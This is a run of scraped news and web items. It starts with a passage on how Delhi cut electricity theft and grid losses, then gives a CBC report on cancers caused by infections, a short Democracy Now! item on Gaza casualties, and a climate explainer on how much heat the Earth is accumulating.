The losses in Delhi weren’t caused solely by technical problems. Theft of electricity was rampant, by both the powerful and the powerless (in both senses of the word). Businesses, residential customers, and utility employees with vested interests would siphon electricity from the grid . It was easy to illegally hook into a streetlight or a distribution line running close to one’s house or factory. Utilities didn’t have the resources to identify theft or penalize offenders. Even if they could, the courts were already overburdened, and an electricity regulatory commission that could push for reforms had not yet fully formed.

Side\u2011by\u2011side view of messy exposed wiring vs neatly organized electrical meters. Updated meters have made billing easier and more accurate. Tata Power-DDL

Making matters worse, the utilities and their employees were rarely held accountable for their actions, and so corruption plagued the system. Junior engineers and line workers, many of them lacking appropriate technical skills, were tasked with handling nearly every issue, including outages, flickering, and bill payment. This was too much authority in the hands of people with too little training .

On top of that, customers didn’t pay their bills. Meters were old, frequently faulty, and easily tampered with. Utility employees would take a meter reading by visiting the customer’s property, noting the reading in a book, entering it in a ledger or on a computer back at the office, and converting it into an electricity bill that would get dropped off at the customer’s property. This process left a lot of room for incorrect billing.

To pay a bill, customers had to stand in long queues at the utility offices, which had limited business hours. Not wanting to take off a half day of work for this, many customers simply didn’t pay. And there was no penalty for not paying—there were no regulations allowing the utilities to cut off a customer’s power. (I paid my bill by having a family member stand in line for me.)

The combined commercial and technical losses left Delhi’s utilities collecting payment for less than half of the electricity they were supplying in the early 2000s.

India’s Electricity Act and Power Reforms

Such problems weren’t unique to Delhi. On average in 2002, state utilities across India experienced electricity losses of nearly 37 percent. My country desperately needed systemic reforms, but authority over electricity was split between the central and state governments so any decision-making was fractured. States managed most of the generation, as well as transmission and distribution, while the central government oversaw generation that supplied multiple states, such as hydropower, fossil fuel plants, and nuclear plants. The central government could push reforms, but the states determined whether those reforms would succeed. Making matters worse, most states put a single organization in charge of generation, transmission, and distribution, giving that entity too much control and reducing transparency and competition .

Two men in hard hats wielding tools work on electrical equipment on a sunny day A team of technicians with BSES Rajdhani Power maintains an insulator string on a large power transformer in 2011. BSES Rajdhani Power

In 2001, India’s central government began writing some historic legislation that became the landmark Electricity Act, 2003 . Among the grand reforms aimed at transforming the country’s power industry, it unbundled state oversight of grid networks, creating separate entities for generation, transmission, and distribution. It also opened up the power sector to privatization. It allowed large electricity customers to bypass local distribution companies and purchase electricity from competitors or build their own power plants. It created a central regulatory agency responsible for determining interstate tariffs and promoting market competition in the power sector. And it created mechanisms for prosecuting electricity theft.

Electric equipment inside a security cage Hundreds of capacitor banks have been installed in Delhi to supply reactive power at strategic locations and help stabilize voltage. Tata Power-DDL

In 2002, Delhi was already taking drastic action to fix its grid. The organization overseeing Delhi’s distribution, the Delhi Vidyut Board, was broken up and two private companies—BSES (now Reliance Infrastructure) , and Tata Power —took over distribution. They faced a Herculean task. Tata Power, serving the northern half of Delhi, would have to tackle a combined commercial and technical electricity loss of 53.5 percent. BSES, whose territory was split between two subsidiaries, was facing 51.5 percent losses in South Delhi and 63.1 percent losses in East Delhi.

“The company inherited a deteriorated and overloaded network, massive power theft, weak billing and collection systems, inaccurate consumer records, and an aging, largely untrained workforce,” Dwijadas Basak, CEO of Tata Power, told me. There were over 100,000 unresolved billing complaints, 20,000 pending connection applications, and frequent supply failures, which had severely eroded consumer trust, he added. Both Tata and BSES devised sweeping reforms and human resource development initiatives. The companies followed their own paths over the years, but ultimately implemented similar changes, with similar results.

Delhi’s Electricity System Overhaul

Fixing Delhi’s grid was a journey that involved all stakeholders, including customers, city authorities, and utility employees at all levels. The utilities revamped their organizational structures, diminishing the power of junior staff and creating separate teams to focus on specific tasks. Long-term employees of the erstwhile Delhi Vidyut Board received training from the up-and-comers at the new companies.

On the technical side, both companies installed digital control systems that let them monitor and operate the grid from a central location. Known as SCADA , or supervisory control and data acquisition, the systems offered a bird’s-eye view of the infrastructure, including the status of equipment, voltage, current, power flow, and switch positions, with updates in seconds. This helped the companies identify areas of high loss and theft and make faster decisions based on accurate information.

Three women sit at a long desk facing computer screens; additional screens showing grid operations are behind them. The SCADA (supervisory control and data acquisition) system at Balaji Estate in Delhi’s Kalkaji neighborhood serves as the nerve center of BSES Rajdhani Power’s distribution network in South and West Delhi. It enables real-time visibility, remote control of grid operations, fault identification and isolation, and load management. BSES Rajdhani Power

The utilities also replaced aging transformers and circuit breakers and created extensive maintenance plans for equipment. In 2002, 11 percent of the transformers in the region were failing at any given time. That rate is less than 1 percent today, according to Tata. Crucially, the companies installed hundreds of capacitor banks, including some mobile ones, to supply reactive power at strategic locations. This improvement reduced the total current flowing in the distribution lines and helped stabilize the voltage. They also installed voltage regulators at points in the system where voltage tends to drop.

To reduce theft, the companies replaced bare distribution wires with insulated lines—a single cable for three phases—which made it harder to tap into the lines. The cables also reduced outages because they’re better at preventing ground faults, which can occur when, say, a tree branch falls on the line.

Workers received better sensors and tools to do their jobs safely and accurately. For instance, they were given helmet-mounted voltage sensors, which are safer than handheld ones, and thermal scanning tools to detect hidden defects in the insulation of high-voltage equipment that could otherwise have led to catastrophic failures.

To reduce inaccurate billing and meter tampering, the companies replaced the old electromechanical meters with digital ones that are read with handheld devices. In some locations, radio-frequency-based group metering systems were installed by Tata to consolidate multiple customers’ meters into one. The data is then wirelessly transmitted to a central database, eliminating the need for individual meter readings. The companies are now trying smart meters , which give consumers more control over their electricity bills and give utilities remote control of some equipment (with the customer’s consent) .

To encourage people to pay their bills, the utilities installed kiosks that are available 24 hours a day, and they created a web-based payment system and mobile app. Incentives for early bill payment and community-engagement programs also helped. Assistance from Delhi’s law enforcement considerably reduced electricity theft.

Three women stand at a door threshold, smiling and holding papers.\u00a0 Tata Power hired women living in the 223 slums it serves in the northern parts of the city to knock on neighbors’ doors and remind them to pay their power bills. These payment collectors [left and center], known as abhas, were photographed while speaking with a customer [right] in the Sanjay Basti area of New Delhi in 2017. Prashanth Vishwanathan/Bloomberg/Getty Images

In areas where theft was particularly rampant and losses were as high as 83 percent, according to Tata, the companies took a different strategy. These pockets of Delhi were predominantly occupied by low-income families. Tata Power, and later BSES, worked to improve the water supply for these residents and provide educational opportunities, such as instruction in reading and writing in Hindi as well as financial literacy. These efforts focused on the women, who were at home more , and paid them to collect electricity payments from their neighbors. Bill payment rates from these areas are now on par with those of other parts of Delhi.

In recent years, some customers have been installing rooftop solar panels to take advantage of subsidies and incentives. This trend can reduce electricity losses further because the energy generated at the customer end reduces current in the distribution lines. Customers are also installing more LED lights and energy-efficient appliances, reducing the load in the system.

BSES is using AI to help detect theft. The algorithms analyze consumption patterns in pockets where losses are higher than they should be . The company is also using AI to forecast demand, fine-tune operational efficiency, and provide chatbots for customers .

Quality of Life Improves in Delhi

Life in Delhi is better than it was 25 years ago. I’m not worried that the power may go out and force me to reschedule my activities. My uninterrupted Wi-Fi gives me peace of mind, and my heating and cooling systems keep me and my family comfortable. I rarely need to use our old inverter and battery.

A rickshaw driver charges his vehicle next to an Ola electric scooter at a charging station The sharp rise of e-rickshaws in Delhi has increased demand on the power grid. Sajjad Hussain/AFP/Getty Images

The number of businesses in Delhi has increased substantially, in part because of the access to quality power. People can confidently buy products that depend on electricity. In fact, the city’s peak electricity demand has tripled since 2002 due to the increase in population, commercial activity, and use of electrical gadgets.

And then there’s the benefits to the planet. One unit of electricity that isn’t frittered away is one less unit that must be generated, not to mention the reductions in carbon emissions.

Still, there’s work to do. Some areas of Delhi continue to have high losses, driven partly by the illegal charging of e-rickshaws. Elsewhere in India, the states of Himachal Pradesh, Madhya Pradesh, Maharashtra, and Telangana still experience losses of about 17 to 23 percent despite the sweeping Electricity Act, 2003. There are many reasons for the ongoing losses: long distribution lines to remote villages, less digitization, and inefficiencies in billing and collection of payments.

These regions, and others around the world, can learn from Delhi’s grid comeback. Recently, power losses have increased substantially in countries such as Argentina, Greece, Jamaica, and Morocco, according to the World Bank , and some of the causes are similar to those that Delhi faced back in 2002.

Meanwhile, Australia, most countries in North America and Europe, and a few countries in Asia and Africa experience low electricity losses as they invest regularly in their distribution infrastructure and the ethical enforcement of rules. In China, for example, losses have gradually been cut in half, from 7.1 to 3.4 percent. In Latvia, losses plummeted from 25 to 5.8 percent.

What’s important is a comprehensive approach. Technologies like smart metering, AI, and analytics certainly help, but equally important is that people in the field are trained and take responsibility for their jobs, and that laws are enforced and payments collected.

“Sustainable loss reduction cannot happen through technology alone,” Abhishek Ranjan, CEO of BSES Rajdhani Power told me. “Technology is an important enabler, but long-term success comes from combining it with disciplined execution, operational accountability, and strong consumer engagement.”

Without the Hot Air

Hacker News
www.withouthotair.com
2026-09-29 08:38:18
Comments...

1 in 8 cancer cases worldwide are caused by infections, study finds

Hacker News
www.cbc.ca
2026-09-29 08:33:50
Comments...
Original Article

| CBC News | Posted: September 29, 2026 8:00 AM | Last Updated: Just now

Researchers estimate infections caused 2.3 million new cancer cases worldwide in 2024

Image | Pakistan HPV Vaccine

Caption: A health worker shows vials of human papillomavirus (HPV) vaccine during a campaign aiming to protect girls from cervical cancer, in Karachi, Pakistan, in 2025. The virus causes 100 per cent of cases of cervical cancer. (Fareed Khan/The Associated Press)

For many people, sun exposure, smoking and family history are the first thoughts that come to mind regarding cancer risk factors. While infections are rarely high on the list, new research shows one in eight cancers worldwide are actually caused by them.

These viruses, bacteria and other microbes are the focus of a new paper published Monday in

The Lancet Oncology

that linked an estimated 2.3 million new cancer cases in 2024 — 12 per cent of all new cases —  to these infectious agents.

A team of researchers at The International Agency for Research on Cancer (IARC), an arm of the World Health Organization, conducted the study. They found the largest number of cancer cases attributed to infections globally were caused by the bacterium Helicobacter pylori , which can increase the risk of stomach cancer and accounted for 760,000 cases, predominantly in eastern Asia.

Human papillomavirus (HPV) followed close behind. HPV, which causes 100 per cent of cervical cancer cases and also anal, vulvar, vaginal, penile and some head and neck cancers, accounted for nearly 750,000 new cases globally, with high rates in sub-Saharan Africa. Hepatitis B virus (HBV) and hepatitis C virus (HCV) were also linked to a significant number of liver cancer cases.

For the first time, researchers linked even more cancers to infections, expanding their list to include 16 additional ones.

Gary Clifford, a cancer epidemiologist and study co-author based in Lyon, France, said the science has advanced significantly.

"There's been new infectious agents identified in this time as being cancer-causing, and even the infectious agents that we knew about in the past, the evidence has increased about the number of different cancers that they can cause," he said.

Some of those new infectious agents included HIV and its link to cervical cancer, and a very rare virus called Merkel cell polyomavirus that can lead to an aggressive form of skin cancer.

Embed | Leading infectious causes of cancer in 2024 (global estimates)

Open full embed in new tab

Loading external pages may require significantly more data usage than loading CBC Lite story pages.

To come up with numbers, researchers first examined which infections cause cancer, then calculated what fraction of these cancers can be linked to specific infections and applied those calculations to global databases of new cancer cases.

Another significant shift is the recognition of the role of Epstein-Barr virus (EBV). EBV was linked to about 260,000 cases globally in 2024, and can lead to nasopharyngeal cancer, some gastric cancers and Hodgkin's lymphoma.

"That's quite a big burden of cancer caused by Epstein-Barr virus that was not counted in the past, but is now recognized," Clifford said.

Epstein-Barr virus is also a key risk factor in developing

multiple sclerosis

, and unlike some of the other infections that have vaccines or antibiotic treatments, there are no available tools to fight against it.

"The fact that we're seeing Epstein-Barr has caused all these chronic diseases — it's increasingly becoming a target that people need to focus on for prevention," he said.

The global report highlights vast regional differences, mostly driven by historical disparities, researchers said. High-income countries that established cancer screening and vaccination programs over the last few decades are doing much better compared to lower- and medium-resourced countries where access to prevention and treatment is limited.

"We really still have a lot of work to do implementing things that we know work and we've known for a long time but haven't really made it into all populations in the world," Clifford said.

In North America, the burden of cancer-causing infections is much lower, but H. pylori and HPV are the most common sources.

Infections causing cancer in Canada

In Canada, according to

a 2019 study

, the rate of cancers attributable to infections was estimated to be at four per cent. Karena Volesky, an epidemiologist in Montreal, led the Canadian research team while at McGill University.

"It tells us how important each of the 12 infections are," Volesky said of the new global numbers.

While there is a lower prevalence of these forms of infections in Canada, her study estimated these infections lead to more than 7,000 cancer diagnoses each year.

WATCH | HPV vaccination urged:

Media Video | The National :

Caption: Doctors say Canada is facing a silent health crisis of HPV-related cervical cancer that could be prevented if more people got vaccinated against human papillomavirus, the virus that can cause the disease.

Open full embed in new tab

Loading external pages may require significantly more data usage than loading CBC Lite story pages.

"HPV is certainly an infection that we're keeping an eye on in Canada," said Elizabeth Holmes, the director of health policy at the Canadian Cancer Society.

Holmes said cervical cancer rates had been steadily declining in Canada due to robust childhood vaccination programs, but

plateaued last year.

"That's certainly a concern — that we might not meet our goal of elimination of cervical cancer by 2040 unless those rates start to decline again," she said.

Human papillomavirus is transmitted through sexual contact, but the HPV vaccine protects against the most common forms of infection that can cause cancer.

Canada's

cervical cancer elimination plan

aims to increase vaccination rates to 90 per cent, increase screening rates to 90 per cent and ensure timely followup care after screening.

"Right now, only about five provinces are above 80 per cent, and I think at least one is as low as 66 per cent," Holmes said.

Image | HPV Self-Testing Kit

Caption: An at-home self-testing HPV kits in Vancouver, British Columbia in January 2024. (Ben Nelms/CBC)

The stomach bacteria that can lead to cancer

The infection leading to the most cancer cases is Helicobacter pylori , a bacterium first discovered in the early 1980s that mainly leads to gastric cancers. While the research found the highest burden in eastern Asia in countries like Japan, South Korea and China, it's a problem here, too.

"It's a horrible disease to die from," said Dr. Paul Moayyedi, a leading researcher and gastroenterologist at McMaster University. About

2,000 Canadians die

every year from stomach cancer.

Moayyedi wants to see a universal screening program for the bacterium, which can be detected through a blood or breath test, stool sample or endoscopy and treated with a combination of antibiotics over a two-week period.

Image | 2984

Caption: A microscopic image showing leukemia cells in blue that contain Epstein-Barr virus using a fluorescent stain that causes affected cells to glow green under ultraviolet light. (Paul M. Feorino/CDC)

Helicobacter pylori is associated with crowded living conditions and poor sanitation in childhood. While most people with it can live a long life without any issues, if left untreated, it can cause ulcers and stomach cancer for some.

Moayyedi said stomach cancers may not be seen as high priority compared to other types of cancers, but believes screening programs for those at high risk, such as people with a family history of stomach cancers or First Nations communities, would save lives.

"In consultation with the elders of local communities it would be important to at least offer those groups screening if they would want it," he said.

"Buying More Time for the Genocide": Muhammad Shehada on Trump's Gaza Plan 1 Year Later

Democracy Now!
www.democracynow.org
2026-09-29 08:30:12
The Palestinian death toll from Israel’s war on Gaza has surpassed 74,000, according to the Ministry of Health in Gaza. While this figure represents the official death toll as confirmed by local authorities, the true number could be much higher when missing people and indirect deaths are taken...
Original Article

The Palestinian death toll from Israel’s war on Gaza has surpassed 74,000, according to the Ministry of Health in Gaza. While this figure represents the official death toll as confirmed by local authorities, the true number could be much higher when missing people and indirect deaths are taken into account, such as from disease, exposure, denial of medical treatment and the destruction of civic infrastructure. And since the so-called ceasefire brokered by Trump last October, nearly 1,400 Palestinians have been killed in Israeli attacks.

“The [ceasefire] plan ended up just buying more time for the genocide,” says Muhammad Shehada, a writer and analyst from Gaza speaking to Democracy Now! in Copenhagen. “Instead of suspending attacks on Gaza, Israel has been bombing Gaza every day.”

“The idea of the plan was to divide the reconstruction, rehabilitation, Israeli withdrawal, decommissioning of Hamas and Palestinian statehood into three phases,” says Shehada. “So far, only one item of the 20 items on the Trump plan has been fulfilled, and that is the release of every single Israeli hostage in Gaza.”


Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Climate is accumulating 4 Hiroshima atomic bombs worth of heat per second

Hacker News
4hiroshimas.info
2026-09-29 08:14:26
Comments...
Original Article

Our climate is absorbing a lot of heat. When scientists add up all of the heat warming the oceans, land, and atmosphere and melting the ice, they find our climate is accumulating 4 Hiroshima atomic bombs worth of heat every second.

This warming is due to more heat-trapping greenhouse gases in the atmosphere. The burning of fossil fuels means we are emitting billions of tonnes of carbon dioxide every year. This is the main contributor to global warming.

To communicate the sheer amount of heat our planet is accumulating, we have created this widget, embeddable on blogs and also available as a Facebook app, an iPad app, and an iPhone app. To help get the word out on just how much global warming our planet is experiencing, add the widget to your own blog or use the widget on Facebook, like it and share it.

To get the iPhone or iPad app, visit this site on your device and use the big “Get...” button to get instructions. The app is not available through the Apple App Store.

Accumulating Heat

The earth has warmed rapidly over the past century due mainly to human activity, and especially over the past few decades. The increased greenhouse effect has warmed the land and air and melted ice, but most of it (about 90%) has gone into heating the oceans. Several Skeptical Science contributors worked together to publish a scientific paper 1 which combined the land, air, ice, and ocean warming data. It found that for recent decades the earth has been heating at a rate of 250 trillion Joules per second.

“Joules per second” is a difficult unit of measure to appreciate, and is especially foreign to people who are unfamiliar with science. This widget attempts to put that heating into terms that are easier to visualize. 250 trillion Joules per second is equivalent to:

Learn More About...

Climate Heat Carbon Dioxide Impacts

The Climate and Heat

The earth's climate system absorbs heat in many different ways. Increases in the temperatures that people experience day to day are only one of several reservoirs for accumulating heat. While changes in the atmosphere are the easiest to recognize, they are also the most variable and subject to “noise”. Changes in the ocean, where most of the heat is going, have been more steady, while the melting of vast stores of ice is accelerating. The earth continues to warm, day after day, at a concerning rate.

Learn More About Heat in the...

Ocean Atmosphere Land Melting Ice Trends

Climate Trends

When the energy from all of the earth's “heat” reservoirs is combined, the clear, decades long trend is unequivocal and staggering. With the exception of short “hiatus” periods, the earth has been gaining heat, virtually continuously, at an average rate of 250 trillion Joules per second, and this trend shows no serious sign of ending.

Greenhouse Gases

Without greenhouse gases, the temperature at the surface of the earth would be a mere -15°C (5°F). Life on earth is made possible by greenhouse gases.

The earth's atmosphere is mostly transparent to incoming sunlight, which passes through and warms the surface of the earth. Warm objects in turn emit another wavelength of light, one invisible to the human eye, termed “infrared radiation”. Like visible light, infrared radiation passes through the atmosphere and into space.

But small traces of greenhouse gases, such as carbon dioxide, are not transparent to infrared radiation. They absorb and re-emit that energy, trapping some of that heat within the atmosphere.

Climate Changes

Changes in the climate are visible all around us. Some are subtle and seemingly inconsequential, but these changes are accelerating and undeniable.

Spring comes earlier. Tree lines and species are migrating poleward and upward. Glaciers and Arctic ice are retreating at an alarming rate 4 . Sea levels are rising 5 . Every day, more and more studies point towards a changing and warming world in new and sometimes unexpected ways.

Climate Change Fingerprints

The indicators that recent climate change is the result of burning fossil fuels, rather than from some unknown natural variation, are clear and consistent with what we do know.

There are subtle differences to how the world will warm due to greenhouse gases compared with other potential sources (such as an increase in the warmth of the sun). Most importantly, scientists know that greenhouse gases would cause the upper atmosphere to cool rather than warm.

We also know that the source of the additional carbon dioxide in the atmosphere is due to burning fossil fuels. The carbon in fossil fuels differs from atmospheric carbon because it has less of the isotope known as 13 C (Carbon-13), a heavier-than-normal version of carbon. Plants generally prefer the lighter and more common 12 C (Carbon-12) for photosynthesis, so fossil fuels, which are produced from decayed plant matter, are deficient in 13 C. As a result, when we burn fossil fuels we cause the percentage of 13C in the atmosphere to drop, and this change has been detected.

450 ppm

Scientists have established that climate change greater than 2°C (4°F) will likely be extremely dangerous. We are likely to have committed our planet to that degree of warming when atmospheric carbon dioxide concentrations reach 450 ppm (parts per million). The natural, pre-industrial level of carbon dioxide (CO 2 ) was around 285 ppm. The level of CO 2 is currently near 400 ppm.

That level of carbon dioxide, 400 ppm, has not been seen in the atmosphere for millions of years.

At the current rate, adding 2 ppm per year, we will reach 450 ppm around the year 2038, a mere 25 years from now.

Impacts of Climate Change

Not all effects of climate change can be anticipated, and not all effects that are anticipated may come to pass, but the number of expected, negative impacts on human society present a clear and worrying danger. 28 Some of these impacts are already being felt, to varying degrees, although many will not seriously present themselves until temperatures increase by 2°C or more (although we have already committed to more than 1.4°C of warming, depending on actual climate sensitivity).

  • Ecosystem changes, species range shifts and extinctions
  • Threats to food supplies
  • Threats to water supplies
  • Increased and more frequent damage from storms, fires and floods
  • Changes and increases in disease vectors
  • Increased morbidity and mortality from heat waves, floods and droughts

It is important to realize that no matter how strong these impacts are felt now, they will grow worse over time, and when they do, we will have no ability to reverse any of them.

Ocean Heat

More than 90% of all heat being absorbed by the earth, each and every day, is going into the oceans.

The ocean, when viewed from a climate perspective, is often considered in three layers:

  • The surface to 700 meters down.
  • 700 meters to 2000 meters down.
  • 2000 meters down to the bottom (average is about 3800 meters).

For some time, scientists believed that ocean warming would be restricted to the upper 700 meters and that global warming would take a very long time to penetrate deeper than that. Recent studies 2 and modern measurement techniques have shown, however, that the ocean below 700 meters is heating as well, and the amount of energy that it takes to do so is staggerring.

Learn More About...

The Ocean: How We Know

Scientists 2 use ocean heat content measurements from ARGO floats , as well as data from expendable bathythermographs (XBT) and mechanical bathythermographs (MBT).

Argo is an international project to collect information on the temperature and salinity of the upper part of the world's oceans. Argo uses robotic floats that spend most of their life drifting below the ocean surface, reaching depths of 2000m and spending periods of approximately 10 days below the surface. Floats take temperature and salinity measurements as they rise to the surface. After surfacing they transmit their data to satellites and then submerge to repeat the data collection cycle. Currently, there are roughly 3000 floats producing 100,000 temperature/salinity profiles per year.

A bathythermograph is an instrument which has a temperature sensor and is thrown overboard from ships to record pressure and temperature changes as it drops through the water. These were the main instruments used to measure OHC before the ARGO float network was deployed starting about a decade ago to provide more accurate and consistent data.

The Ocean: What We Know

  • The ocean accounts for more than 90% of the heat absorbed by the earth in the past 30 years.
  • The total increase in heat content of the oceans over the period from 1955-2010 was 24 x 10 22 (240,000,000,000,000,000,000,000) Joules.
  • The energy absorbed by the oceans will not quickly dissipate.
  • As the ocean warms it expands, leading to marked sea level rise.
  • Increased ocean temperatures help to warm the atmosphere.
  • Increased ocean temperatures help to generate and intensify storms.
  • Warmer waters, combined with ocean acidification, are pushing some forms of marine life beyond their limits.

The Atmosphere

Changes in the temperature of the earth's atmosphere are the easiest to measure and the most obvious in an individual's personal experience, but the atmosphere is also the most variable. One very warm year can be followed by several cold ones, while one region may experience an unusual cold snap while many other parts of the globe endure record warmth. Many factors can influence global atmospheric temperatures over short time frames of a few years, which in turn disguises the insistent, uninterrupted warming which is occurring overall.

Nevertheless, the atmosphere has warmed by 0.8°C (1.4°F) in the past century. This warming is more exaggerated at the poles, leading to even greater swings in temperatures further from the equator. Yet it still accounts for only 2% of total heat absorbed by the earth's climate.

Variability

Scientists and statisticians have worked together to try to quantify and eliminate the most obvious forms of variability in global atmospheric temperatures by using standard statistical methods. In one study 6 , the authors found that after removing the influence of the most significant three factors (ENSO events, solar variations, and aerosols) the seemingly chaotic, drunken meanderings of the earth's temperature straightened into a clear, steady increase in global temperatures.

In particular, in the past decade, a quiet sun, an increase in La Niña (cold) events, and an increase in aerosols have worked to temporarily slow global warming. This sort of hiatus period is often seen in climate models, when negative factors happen to combine to temporarily overwhelm the global warming signal. It is clear, however, from the evidence that any respite is temporary.

The atmosphere, ocean, land and ice continue to absorb heat, and global warming is going to continue well into our future.

ENSO Events

The Pacific is not only the world's largest ocean, but it also boasts by far the largest expanse of water along the equator, where the sun's rays are strongest. Periodic events, termed El Niño and La Niña, lead to three common states in the equatorial regions of the Pacific. These states in turn affect air temperatures and precipitaiton around the globe, and so are keys to understanding and predicting short-term climate variations.

  • El Niño events denote the spread of warmer than usual waters across much of the equatorial Pacific. This raises temperatures globally.
  • La Niña events denote the piling up of warmer waters in the western Pacific and the spread of cooler than usual waters across the eastern Pacific, off the coast of South America. This reduces temperatures globally.
  • ENSO neutral conditions, when neither an El Niño nor a La Niña is present, is the third state.

One way to view temperature changes without the confusing influences of ENSO events is to compare apples to apples. Compare all El Niño events to each other, La Niña to each other, and neutral conditions. When this is done, again, the constant, upward trend in global temperatures becomes clear.

Solar Variability

The sun supplies virtually all of the energy that fuels the earth's climate, but changes in solar activity are necessary to account for changes in the earth's climate. While the sun did warm slightly in the early part of the Twentieth century, it has since begun to quiet again. These minor changes in solar output, however, are not nearly strong enough to account for warming this century, although they do contribute somewhat to dampening recent anthropogenic warming. A “hot” sun, for example, emits roughly 1367 Watts/meter 2 , while a “cool” sun emits 1365.5 Watts/meter 2 , a difference between “hot” and “cold” of only about one tenth of one percent.

One study 7 used a statistical test on the temperature data, and found that while solar activity can account for about 11% of the global warming from 1889 to 2006, it can only account for 1.6% of the warming from 1955 to 2005, and had a slight cooling effect (-0.004°C per decade) from 1979 to 2005. Multiple other studies 6 8 9 confirm this conclusion.

Aerosols

Volcanoes emit sulfate aerosols which reflect incoming sunlight, cooling the planet. A large volcanic eruption such as the Pinatubo eruption in 1991 can have a global cooling effect of 0.1°–0.3°C (0.18°–0.54°F) for several years 10 .

However, mega-eruptions or a series of eruptions can have a cooling effect that take decades to wear off, giving a perceived warming effect as temperatures return to normal. Scientists have studied past volcanoes 11 , particularly over the past few centuries, and found that early 20 th century warming resulted, in part, from a recovery from earlier periods of heavy vulcanism. In short, a lack of volcanic activity had some part in temperature rise over the first half of the 20 th century. However, it has played little part in the modern global warming trend that began in the 1970s.

More recently, in the past decade, scientists 12 have found that the increase in greenhouse gases was exceeded by an even greater increase in sunlight-reflecting sulfate aerosols, which originate from the rapid industrialization of China. Chinese coal-burning in particular doubled in the 4 years from 2003-2007, and makes up some 77% of the 26% global aerosol increase over that time. Unfortunately, aerosols fall out of the atmosphere fairly quickly, while carbon dioxide remains there for centuries or longer.

The Atmosphere: What We Know

  • Only 2.3% of warming goes into the atmosphere.
  • Within one year, from summer to winter, global mean tropospheric temperatures vary by as much as 1.5°C (2.7°F).
  • Year to year, from one season to the next, global mean tropospheric temperatures can vary by as much as 1°C (1.8°F).
  • Year to year, from one season to the next, global mean surface air temperatures can vary by as much as 0.2°C (0.36°F).
  • A minimum of 17 years is needed to accurately detect and confirm a trend — a steady change — in the rise of atmospheric temperatures.
  • A variety of natural (temporary) factors combined in the past decade to produce a strong cooling influence on atmospheric temperatures.
  • The known anthropogenic warming component has offset and overpowered natural cooling factors, so that a slight warming trend is still detectable.
  • Natural cooling factors (a preponderance of La Niña events, weak solar output, increased anthropogenic aerosols) are temporary, while the effects of anthropogenic CO 2 are effectively permanent.

The Atmosphere: How We Know

Scientists have successfully measured air temperatures around the globe, both at the surface and in the troposphere and stratosphere, in the present as well as in the distant past.

Surface air temperatures have been accurately measured and homogenized — meaning “made comparable” — using scientific instruments and rigorous collection and analysis techniques.

Tropospheric and stratospheric temperatures have been accurately measured using an array of long-lived satellites which measure the radiation, primarily microwaves, emitted by the atmosphere.

Past temperatures have been measured using a variety of different proxies, which have been compared to check their validity and confirm their accuracy. Proxy methods include the measurement of the frequency of stable atmoic isotopes, such as 17 O and 18 O (“heavy hydrogen”), in ice cores and ocean sediments, the evaluation of ancient pollen, flora and fauna in lake and ocean sediments,and other methods.

The Land

Until 2001, scientists had mostly concentrated on detecting heat uptake by the atmosphere and oceans and by melting ice. That year, however, a group of scientists published a study 3 which attempted to measure the heat uptake by the lithosphere — the outermost rocky shell of the earth. That study found that heat absorbed by land actually roughtly matches the amount of heat absorbed by melting ice (such as the Greenland Ice Sheet, polar ice caps, and glaciers). The heat absorbed (only) by land also substantially matches that absorbed to date by the atmosphere.

Thus, the heat uptake by the continents is a tangible and necessary component in computing the total increase in heat in the entire earth system due to anthropogenic warming. This uptake accounts for about 2% of the heat absorbed by the earth's climate system.

Melting Ice

The earth houses vast amounts of water in the form of (once) permanent ice. This includes ice at the Arctic and Antarctic poles, the Greenland Ice Sheet, and over 130,000 glaciers. Due to global warming, much of this ice is melting at an alarming rate 26 . That permanent ice melt, in turn, absorbs a lot of heat and produces a vast amount of liquid water. Still, this ice melt only accounts for 2% of the total heat absorbed by the earth's climate.

Melting Ice: Glaciers

Glaciers are dynamic, living rivers of ice. They are fed at their source by precipitation which falls as or freezes into ice. Packed and forced to flow by gravity, these rivers slowly and inexorably carve valleys down mountain sides, until the ice reaches an altitude below which temperatures are above freezing, and they melt.

While these glaciers continue to be fed from above — subject to potential changes in precipitation patterns due to climage change — as global temperatures rise, the altitudes at which their ice melts also rise, shortening and in some cases completely eliminating the glacier.

Nearly 1% of all heat absorbed by the earth's changing climate currently goes into shrinking the size of glaciers. More importantly, measurements show that this ice loss is accelerating 13 14 15 .

Melting Ice: Greenland

The Greenland Ice Sheet (GIS) is a unique feature on earth. Greenland is the world's largest island, at 2,166,086 square kilometers (836,109 sq mi). It is home to one of only two permanent ice sheets on earth, most of which is between 2 and 3 kilometers (1 and 2 miles) thick. If the entire ice sheet were to melt it would raise sea levels by 7.2 meters.

The coastal regions have been observed to be losing ice mass while the interior is in approximate mass balance. The overall result is that the Greenland ice sheet is losing ice mass 16 17 . Further evidence suggests that although ice losses have up to this point primarily occurred in the South and Southwest portions of Greenland, these losses are now spreading to the Northwest sector of the ice sheet 18 . The current rate of loss is over 250 gigatons (billion tons) per year, and that rate has been continuosly accelerating.

Melting Ice: Arctic

Arctic ice represents one pole (which is very different from the other). The Arctic is an ocean, surrounded by land, at one end of the globe (the North Pole). In that position, for a good portion of the year it receives no sunlight at all, while for an equal portion it receives extended, albeit very indirect, daylight — at times for 24 hours a day.

With this dynamic, the water in the Arctic is able to freeze over completely during the winter. In the summer months, some Arctic ice has always melted, but prior to recent decades, the bulk of the ice remained completely frozen. Since 1979, scientists have been using satellites to track the ice extent, which is erratically but systematically shrinking. Satellite radar altimetry and satellite laser altimetry find that Arctic sea ice has also been thinning 19 20 . The Arctic is expected to have a completely ice free summer sometime this century 21 . This means that each winter the ice is not re-freezing to the winter extent and volume of the previous year.

Year after year, despite the ongoing fluctuations, the Arctic is losing ice mass.

Melting Ice: Antarctic

Antarctic ice represents one pole (which is very different from the other). Antarctica is a continent, at one end of the globe (the South Pole). In that position, for a good portion of the year it receives no sunlight at all, while for an equal portion it receives extended, albeit very indirect, daylight — at times for 24 hours a day. Due to the altitude of its mountains it contains masses of ice which have no opportunity to melt, regardless of climate change.

At lower altitudes, the ice is subject to melting. Beyond this, much of the ice in Antarctica rests in the ocean, submerged by its own weight. But as the ocean waters warm, that ice is melting from beneath 22 . The result of this warming is that Antarctica is losing ice mass 23 .

